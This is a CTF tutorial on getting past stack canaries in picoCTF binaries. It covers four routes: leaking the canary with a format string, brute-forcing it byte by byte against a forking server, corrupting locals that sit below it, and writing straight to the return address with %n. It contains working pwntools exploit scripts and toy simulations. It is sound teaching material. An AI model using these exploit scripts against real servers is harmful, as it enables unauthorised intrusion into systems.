June 11, 2026

Stack Canary Bypass for CTF: Leak It, Brute It, or Walk Around It

Stuck at '*** stack smashing detected ***' on a picoCTF binary? Stack canary bypass, three ways: leak it with a format string, brute-force it across forks, or never cross it at all.

The wall and the speed bump

You found the overflow. Your offset is right, cyclic gave you a clean number, and you send the payload expecting a shell. Instead the program prints *** stack smashing detected ***: terminated and dies with an abort. That message is a stack canary doing its job: a random value the compiler slipped between your buffer and the saved return address, checked right before the function returns. Overwrite the return address with a linear overflow and you also overwrite the canary, the check fails, and the process kills itself before your address ever loads.

The first time I hit this I assumed I had botched the offset and spent twenty minutes re-running cyclic. The offset was fine. I just had not run checksec, so I never noticed the binary had a guard I needed to deal with. Here is the thing that would have saved me the twenty minutes: a canary is a speed bump, not a wall. It guards exactly one route, and there are a handful of standard ways around it.

The canary does not protect the return address. It protects one road to it: a contiguous overflow, checked once at ret.

That reframe is the whole article. Stop asking "how do I defeat the canary" and start asking "do I even need to cross it?" Once you do, the bypasses sort themselves into two branches. You either satisfy the check (make sure the right canary value is sitting there when ret runs) or you avoid the check (reach your target without a changed canary ever reaching the comparison). Here is the map before the details.

| Branch | Bypass | Use when | picoCTF receipt |
| --- | --- | --- | --- |
| A: satisfy | Leak it | You can read stack memory (format string, out-of-bounds read) | guessing game 2 |
| A: satisfy | Brute-force it | The server forks per connection, or the canary is static | buffer overflow 3 |
| B: avoid | Hit a target below the canary | A function pointer or data local sits between the buffer and the canary | babygame02 |
| B: avoid | Write straight to the return address | You have an arbitrary write (format string %n) and skip the overflow entirely | echo valley |

If you do not already know how a plain stack overflow works, start with the Buffer Overflow guide and come back. Everything below assumes you can already smash a return address when nothing is in the way.

What a canary actually guards

When you compile with stack protection on, the function prologue copies a secret value onto the stack just above the local variables, and the epilogue checks it before ret. On x86-64 with glibc the reference copy lives in the thread control block at %fs:0x28; targets without a TLS slot for it use a global named __stack_chk_guard instead. It is set once, at process startup, from the kernel-supplied AT_RANDOM bytes in the auxiliary vector. The compiled check is small and always the same shape:

; function epilogue, right before ret
mov rax, QWORD PTR fs:0x28 ; load the real canary
xor rax, QWORD PTR [rbp-0x8] ; compare against the stack copy
je .ok ; equal? carry on to ret
call __stack_chk_fail ; different? abort()

__stack_chk_fail is the thing that prints *** stack smashing detected *** and calls abort(). It is marked noreturn, so there is no clever way to fall through it. The check is honest and cheap. That is the point of canaries: one random qword and four instructions per guarded function, in exchange for catching the most common memory-corruption bug class. As a defense it is a genuinely good trade. As an obstacle in front of you, it is narrow.

Takeaway

The canary only sees a change if a contiguous overflow runs through it, and it only reacts at ret. Anything below it on the frame, and any write that does not return through that epilogue, is out of its jurisdiction.
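
A toy model makes that jurisdiction concrete. The sketch below is not glibc's implementation: it treats one frame as a bytearray with an assumed layout (16-byte buffer, canary, saved rbp, saved return address), and the helper names and addresses are made up for illustration.

```python
import os
import struct

BUF_SIZE = 16                  # assumed buffer size for this toy frame
CANARY_OFF = BUF_SIZE          # canary sits directly above the buffer
RET_OFF = CANARY_OFF + 16      # skip the canary (8) and saved rbp (8)

def new_canary() -> bytes:
    """8 bytes with the first in-memory byte forced to 0, glibc-style."""
    return b"\x00" + os.urandom(7)

def build_frame(canary: bytes) -> bytearray:
    """Buffer, canary, saved rbp, saved return address, lowest address first."""
    return bytearray(
        b"\x00" * BUF_SIZE
        + canary
        + struct.pack("<Q", 0x7FFD00001000)   # saved rbp (made-up value)
        + struct.pack("<Q", 0x401234)         # saved rip (made-up value)
    )

def linear_overflow(frame: bytearray, data: bytes) -> None:
    """Copy data starting at the buffer, like an unbounded read into it."""
    frame[0:len(data)] = data

def epilogue_ok(frame: bytearray, canary: bytes) -> bool:
    """Stand-in for the compare before ret: stack copy vs. the real value."""
    return bytes(frame[CANARY_OFF:CANARY_OFF + 8]) == canary

canary = new_canary()
new_rip = struct.pack("<Q", 0xDEADBEEF)

# Naive smash: filler runs straight through the canary slot.
smashed = build_frame(canary)
linear_overflow(smashed, b"A" * RET_OFF + new_rip)
print(epilogue_ok(smashed, canary))    # False

# Same overflow, but the real canary is written back into its slot.
replayed = build_frame(canary)
linear_overflow(replayed, b"A" * BUF_SIZE + canary + b"B" * 8 + new_rip)
print(epilogue_ok(replayed, canary))   # True
```

Both payloads overwrite the saved return address. Only the one that runs through the canary with the wrong bytes gets caught, which is the whole of Branch A in miniature.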

One detail of that layout does a lot of work later: on glibc the canary's least-significant byte is a null. glibc zeroes it when it sets the canary up at startup, so that string operations stop at the canary: a strcpy-style overflow cannot write the full canary and keep going, and a %s over-read halts before it leaks the rest. That null byte cuts both ways. It makes the canary slightly easier to spot when you leak the stack (it is the qword ending in 00) and it drops a 64-bit brute-force from eight unknown bytes to seven. Defenders gave up a little entropy to stop a different attack, and that is a tradeoff you get to exploit.
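
Here is that null byte in a few lines of standard-library Python. The input qword is an arbitrary example value, not a real leak, and c_string_read is a hypothetical stand-in for any read that stops at the first null.

```python
import struct

def glibc_style_canary(random_qword: int) -> int:
    """Clear the least-significant byte, leaving 56 random bits."""
    return random_qword & 0xFFFFFFFFFFFFFF00

def c_string_read(memory: bytes) -> bytes:
    """What a string-style read returns: everything before the first null."""
    return memory.split(b"\x00", 1)[0]

canary = glibc_style_canary(0x1122334455667788)   # example value only
in_memory = struct.pack("<Q", canary)             # little-endian: low byte first
stack = b"A" * 16 + in_memory + b"SAVED_RBP"      # unterminated buffer, then canary

print(hex(canary))            # 0x1122334455667700
print(in_memory[0])           # 0
print(c_string_read(stack))   # b'AAAAAAAAAAAAAAAA'
```

Because x86 is little-endian, the low byte is the first byte in memory, so it is the byte sitting right next to your buffer. That is why a string read over an unterminated buffer stops exactly at the canary's doorstep.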

Step 0: is there even a canary?

Before you pick a bypass, spend ten seconds confirming the problem exists. checksec (ships with pwntools) tells you in one line.

$ checksec --file=./vuln
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found <- this is your speed bump
NX: NX enabled
PIE: PIE enabled

If it says No canary found, you are done reading this post: go overwrite the return address. If it says Canary found, the other lines already tell you which downstream fight you are in. NX enabled (no-execute) means no shellcode on the stack, so getting past the canary leads into ROP. PIE enabled means you also need a code or stack leak, covered in the ASLR and PIE Bypass post. The canary is rarely the only thing standing between you and the flag, but it is usually the first.

Tip: Read checksec as a shopping list, not a verdict. "Canary found, Full RELRO, PIE" is not "impossible," it is "you need a leak, and the leak probably solves the canary for free." One format-string bug often pays for all three at once.
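
If checksec is not installed on the box you are working from, a crude stand-in is to look for the failure handler's name in the file. This is a heuristic sketch, not what checksec does internally: has_canary_symbol is a made-up helper, and a stripped, statically linked binary can be guarded without carrying the string.

```python
from pathlib import Path

def has_canary_symbol(path: str) -> bool:
    """Heuristic: a guarded, dynamically linked binary names __stack_chk_fail."""
    return b"__stack_chk_fail" in Path(path).read_bytes()

if __name__ == "__main__":
    import sys
    for binary in sys.argv[1:]:
        verdict = "canary likely" if has_canary_symbol(binary) else "no canary symbol seen"
        print(f"{binary}: {verdict}")
```

Treat a hit as "probably guarded" and a miss as "check properly before you celebrate."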

Branch A: satisfy the check

In this branch the canary check still runs and still compares. You just make sure the value it finds on the stack matches the real one. There are two ways to know the value: read it, or guess it one byte at a time.

Leak it with a format string

The canary is a local variable. If you can read the stack, you can read the canary, and the cleanest stack-read primitive in CTF is a format string bug, a printf(user_input) with no format string of its own. Each %p prints the next stack slot, and %n$p jumps straight to slot n. So the workflow is: find which slot reflects your own input, count up to the canary's slot, leak it, then drop that exact value back into your overflow so the epilogue XOR comes out zero.

guessing game 2 is the textbook version. It is a 32-bit binary with Full RELRO, NX, and a canary, plus both a format string bug and a buffer overflow. The input buffer shows up at format parameter 7. The buffer is 512 bytes, which is 128 four-byte slots, so the canary sits at parameter 7 + 128 = 135. One request leaks it:

from pwn import *

elf = ELF('./vuln')  # local copy of the challenge binary; the path is an assumption
io = remote('saturn.picoctf.net', 12345)

# leak the canary directly at its stack parameter
io.sendline(b'%135$p')
canary = int(io.recvline().strip(), 16)
log.info(f'canary = {canary:#x}') # ends in 00 on a real glibc canary

# now overflow, but write the real canary back into its slot
payload = b'A' * 512 # fill the buffer
payload += p32(canary) # canary unchanged -> check passes
payload += b'B' * 4 # saved EBP
payload += p32(elf.sym['win']) # saved EIP
io.sendline(payload)

Warning: Leak with %p or %lx, never %s. The canary ends in a null byte, so a string-style over-read stops right before it, and a positional %s would treat the canary value itself as a pointer and dereference garbage. You want the raw stack slot, not a string starting at it.

If you are fuzzy on finding the parameter offset or turning %p chains into a targeted read, the Format String guide walks the whole primitive. The only canary-specific trick is recognizing the leak: it is the qword (or dword) ending in 00, sitting where the frame layout says the canary should be.
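
The slot arithmetic is worth writing down once so you stop doing it in your head. This sketch assumes the canary sits immediately after the buffer with no padding or extra locals in between, which you should confirm in a debugger; the helper names are made up for illustration.

```python
def canary_param(buf_param: int, buf_bytes: int, word_bytes: int) -> int:
    """Format parameter index of the slot right after the buffer."""
    return buf_param + buf_bytes // word_bytes

def parse_leak(line: bytes) -> int:
    """Turn one %p result into an int; glibc prints a null pointer as (nil)."""
    text = line.strip()
    return 0 if text == b"(nil)" else int(text, 16)

def plausible_canary(value: int) -> bool:
    """glibc-style canaries are nonzero and end in a 00 byte."""
    return value != 0 and value & 0xFF == 0

print(canary_param(7, 512, 4))                  # 135
print(plausible_canary(parse_leak(b"0x5d3a9c00\n")))   # True
print(plausible_canary(parse_leak(b"0xffd1a2b4\n")))   # False
```

If the leak at the computed parameter does not end in 00, the layout assumption is off: dump a few neighbouring parameters and look for the one that does.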

Takeaway

A format string bug in the same function as the overflow is the easiest canary bypass there is. Leak the slot ending in 00, paste it back into the payload, and the guard waves you through.

Brute-force it across forks

No leak? Sometimes you can guess the canary one byte at a time, and the precondition is specific: the same canary has to survive across your attempts. That happens in two situations. The common one is a forking server. When a process calls fork(), the child is a byte-for-byte copy of the parent, including the canary, the ELF base, and the libc base. If the server forks a fresh worker per connection and the worker crashing does not re-randomize anything, every connection hands you the identical canary.

That turns the check into an oracle. Fill the buffer up to the canary, append one guessed byte, and see what happens. If the connection survives, the byte was correct. If the child aborts, it was wrong, so try the next value. Lock in each correct byte as the prefix for the next position. The math is friendly: a 64-bit canary has a known null low byte, so seven unknown bytes at up to 256 guesses each is at most 7 × 256 = 1,792 connections, and roughly 896 on average. Compare that to 2^56 if you tried to guess all seven at once.

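from pwn import *

HOST, PORT = 'localhost', 1337  # placeholders: point these at the target
OFFSET = 64                     # placeholder: bytes from buffer start to the canary

canary = b'\x00' # glibc canary's low byte is null
while len(canary) < 8:
    for guess in range(256):
        io = remote(HOST, PORT)
        io.send(b'A' * OFFSET + canary + bytes([guess]))
        crashed = b'smashing' in io.recvall(timeout=1)
        io.close()
        if not crashed:
            canary += bytes([guess]) # survived -> byte is correct
            break
    else:
        # no byte survived: the offset or the oracle is wrong, so stop looping
        raise RuntimeError('no byte survived; check OFFSET and the oracle')
log.success(f'canary = {canary.hex()}')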
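
You can sanity-check the connection count offline before pointing anything at a server. The sketch below swaps the network for a hypothetical in-process oracle that "survives" exactly when the guessed prefix matches the secret, which is the behaviour the fork server gives you; the names are made up for illustration.

```python
import os

def make_oracle(secret: bytes):
    """Return (oracle, counter); each oracle(prefix) call models one connection."""
    attempts = {"n": 0}

    def oracle(prefix: bytes) -> bool:
        attempts["n"] += 1
        # Only the overwritten prefix can differ; the rest of the canary is intact.
        return secret.startswith(prefix)

    return oracle, attempts

def brute_canary(oracle, size: int = 8, known: bytes = b"\x00") -> bytes:
    """Recover the canary one byte at a time, starting from the known prefix."""
    canary = known
    while len(canary) < size:
        for guess in range(256):
            if oracle(canary + bytes([guess])):
                canary += bytes([guess])
                break
        else:
            raise RuntimeError("no byte survived; the oracle is unreliable")
    return canary

secret = b"\x00" + os.urandom(7)
oracle, attempts = make_oracle(secret)
recovered = brute_canary(oracle)
print(recovered == secret, attempts["n"])   # True, and never more than 1792
```

Calling brute_canary(oracle, size=4, known=b"") models the static 4-byte case, where no byte is known up front and the ceiling is 4 × 256 = 1,024 attempts.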

The picoCTF sibling is buffer overflow 3, which strips the problem down to its core. It is a 32-bit binary whose 4-byte canary is read from a file, so it is literally static across runs, no fork required, and you brute-force all four bytes byte-by-byte with the crash message as the oracle. The recovered canary is the ASCII string BiRd, and the flag it hands back is picoCTF{Stat1C_c4n4r13s_4R3_b4D_...}. The challenge moralizes at you through the flag itself: static canaries are bad. So, it turns out, are brute-forceable ones.

Note: This is not just a CTF toy. The BROP attack ("Hacking Blind," Bittau et al., IEEE S&P 2014) brute-forces the canary and return address of a forking server with no binary at all. Their named example is nginx, which forks workers without re-randomizing. The exact byte-at-a-time oracle you use on a picoCTF binary is the same primitive that read a real web server's stack blind.

Takeaway

Brute force needs the canary to repeat: a fork server that does not re-randomize, or a static canary. When it repeats, the crash-or-survive signal collapses a 56-bit secret to about 900 connections.

Branch B: don't cross the canary

Branch A is the obvious branch, and it is the one most tutorials stop at. Branch B is where the reframe pays off, so this is the part worth slowing down for. The canary only matters if a changed copy of it reaches the comparison at ret. Two kinds of exploit never make that happen: ones that hit a target sitting below the canary, and ones that do not use a contiguous overflow at all.

Hit a target below the canary

Look at the frame diagram again. The canary sits between the buffer and the saved return address, but plenty of useful things live below it, between the buffer and the canary: other local variables, a loop counter, a flag, a function pointer the program is about to call. If the thing you need to corrupt is one of those, you never touch the canary. A linear overflow that stops short of the canary, or, more commonly, an out-of-bounds index that writes to a specific slot directly, lands on your target and the epilogue check sails through unchanged.

babygame02 is exactly this. It has an out-of-bounds array write, and instead of reaching for the return address it clobbers a single data variable, a counter the game logic checks, with one byte. The canary guards the saved return address and the saved frame pointer. It does not guard an adjacent integer. A one-byte write to that integer slips right past the check, because the check is never asked about it.

Key insight: Compilers know about this and fight back a little: -fstack-protector-strong reorders buffers above other locals so an overflow tends to hit the canary before it hits a sensitive variable. It is a real mitigation and it is also incomplete. Buffer reordering does nothing against an out-of-bounds index that computes the target address directly, which is why babygame02 works.
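
The difference between "overflow" and "indexed write" is easy to see in a toy frame. The layout here is an assumption for illustration (a 4-byte counter just below a 16-byte array, canary above the array), not the layout of any particular challenge binary, and buggy_store is a made-up name for an unchecked array store.

```python
import struct

COUNTER_OFF = 0    # 4-byte int the program logic checks (assumed layout)
GRID_OFF = 4       # 16-byte array the program indexes into
CANARY_OFF = 20    # canary sits above the array

def build_frame(canary: bytes) -> bytearray:
    """Counter, array, canary, lowest address first."""
    return bytearray(struct.pack("<i", 0) + b"." * 16 + canary)

def buggy_store(frame: bytearray, index: int, value: int) -> None:
    """grid[index] = value with no bounds check on index."""
    frame[GRID_OFF + index] = value

def epilogue_ok(frame: bytearray, canary: bytes) -> bool:
    """Stand-in for the compare before ret."""
    return bytes(frame[CANARY_OFF:CANARY_OFF + 8]) == canary

canary = b"\x00" + bytes(range(1, 8))   # fixed example value, low byte null
frame = build_frame(canary)

buggy_store(frame, -4, 0x40)            # index -4 lands on the counter's low byte

print(struct.unpack_from("<i", frame, COUNTER_OFF)[0])   # 64
print(epilogue_ok(frame, canary))                        # True
```

One byte changed, the counter now reads 64, and the comparison at ret has nothing to object to because the canary slot was never written.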

Write straight to the return address

The deepest version of "don't cross it" is to drop the overflow entirely. A format string write, %n and friends, is an arbitrary write-what-where. It does not march byte by byte from a buffer. It writes the bytes you choose at the address you choose. Point it at the saved return address on the stack, or at a GOT (Global Offset Table) entry, and the canary is irrelevant: you wrote to one specific location and nothing in between moved.

echo valley is the clean demonstration. checksec reports PIE, Full RELRO (read-only relocations), NX, and a canary, which looks intimidating, but the bug is a printf(buf). You leak a stack slot to defeat PIE, then use pwntools fmtstr_payload to write the address of print_flag directly onto the saved return address. As the writeup itself notes, the format-string write targets the return address "without corrupting the canary, so canary detection is not triggered." Full RELRO took the GOT off the table, so the saved return address is the target, and the canary that the whole binary advertises in checksec never gets a vote.
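
For a feel of what a format-string write does under the hood, here is the byte-at-a-time %hhn arithmetic in plain Python. It is a simplified sketch, not pwntools' actual algorithm: hhn_plan and simulate are made-up helpers, the target value is an invented address, and a real payload also has to place the destination addresses on the stack.

```python
def hhn_plan(value: int, width: int = 8, printed: int = 0):
    """For each byte of value (lowest address first), compute how many
    padding characters to print before the %hhn that stores it."""
    plan = []
    for i in range(width):
        target = (value >> (8 * i)) & 0xFF
        pad = (target - printed) % 256   # 0 means: emit no padding for this byte
        plan.append((i, target, pad))
        printed += pad
    return plan

def simulate(plan, printed: int = 0) -> int:
    """Replay the plan: each %hhn stores the low byte of the output count."""
    result = 0
    for i, _target, pad in plan:
        printed += pad
        result |= (printed & 0xFF) << (8 * i)
    return result

target = 0x0000555555555269              # invented address for illustration
plan = hhn_plan(target)
print(simulate(plan) == target)          # True
```

Every store lands on an address you chose, one byte at a time. Nothing between the buffer and the saved return address is touched, so the canary slot stays exactly as the prologue left it.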

A canary assumes you will overflow the buffer. The moment you stop overflowing the buffer, it is guarding an empty hallway.

Takeaway

The strongest bypass is the one that makes the canary a non-event. Corrupt a target below it, or use an arbitrary write so there is no overflow to detect, and the guard never enters the picture.

Which bypass, in order

When checksec says Canary found, do not start typing. Ask these in order and stop at the first yes.

  1. Is your real target below the canary, a function pointer or a data local you can reach? Then ignore the canary and corrupt that. Branch B, no leak needed.
  2. Do you have an arbitrary write (a format string %n)? Write straight to the return address or GOT and skip the overflow. Branch B, no leak needed.
  3. Can you read stack memory (format string, out-of-bounds read)? Leak the slot ending in 00 and replay it in your overflow. Branch A.
  4. Does the server fork, or is the canary static? Brute-force it one byte at a time. Branch A.
  5. None of the above? The canary is actually costing you something. Go find a leak primitive first; that is the honest answer, and it is rarer than beginners fear.

Notice the order. The bypasses that need nothing extra come first, and the ones that need a separate primitive come last. That is the opposite of how the techniques are usually taught, leak-first, because leaking is the one everybody learns first. In practice, "do I even need to cross it?" is the cheaper question, so ask it first.
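
The checklist is mechanical enough to write as a function. This is only a restatement of the five questions above; the Primitives fields and the returned strings are made-up names for illustration.

```python
from dataclasses import dataclass

@dataclass
class Primitives:
    target_below_canary: bool = False   # function pointer or data local in reach
    arbitrary_write: bool = False       # e.g. a format string %n
    stack_read: bool = False            # format string or out-of-bounds read
    canary_repeats: bool = False        # fork server or static canary

def pick_bypass(p: Primitives) -> str:
    """Ask the questions in order and stop at the first yes."""
    if p.target_below_canary:
        return "B: corrupt the target below the canary"
    if p.arbitrary_write:
        return "B: write straight to the return address or GOT"
    if p.stack_read:
        return "A: leak the canary and replay it"
    if p.canary_repeats:
        return "A: brute-force it one byte at a time"
    return "find a leak primitive first"

print(pick_bypass(Primitives(arbitrary_write=True, stack_read=True)))
# B: write straight to the return address or GOT
```

Note that a binary with both a read and a write primitive resolves to Branch B: the arbitrary write wins because it needs no canary value at all.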

Quick reference

| Bypass | Precondition | Key move |
| --- | --- | --- |
| Leak (format-string read) | Stack read primitive in the vulnerable function | Find the slot ending in 00, replay it in the payload |
| Brute (byte-at-a-time oracle) | Fork server with no re-randomization, or static canary | Guess each byte, survive = correct, ~896 tries on 64-bit |
| Below (corrupt a target under the canary) | Function pointer or data local between buffer and canary | OOB index write straight to the slot, canary untouched |
| Around (arbitrary write to RIP / GOT) | Format-string %n write | fmtstr_payload to the saved return address, no overflow |

Getting past the canary is rarely the last step. With NX on you land in ROP; with PIE on you still need the leak from the ASLR and PIE Bypass post; and the whole thing gets scripted with patterns from the pwntools guide. If you want to watch the canary check fire in slow motion, set a breakpoint on __stack_chk_fail using the GDB guide and step through the epilogue.

One concrete drill. Open guessing game 2 and echo valley side by side. Both have a canary and a format string. One leaks the canary and overflows past it; the other never overflows and never leaks the canary at all. Same protection, two branches. Once you can see why the second binary's canary is doing nothing, the message stack smashing detected stops being a wall and turns into a question: which branch is this?

The canary is a real cost. It turns "I overflowed the buffer" into "I overflowed the buffer and I have a leak, a fork, or a better target." That is a meaningful raise. It is just not a wall, and you should stop treating it like one.

Sources and further reading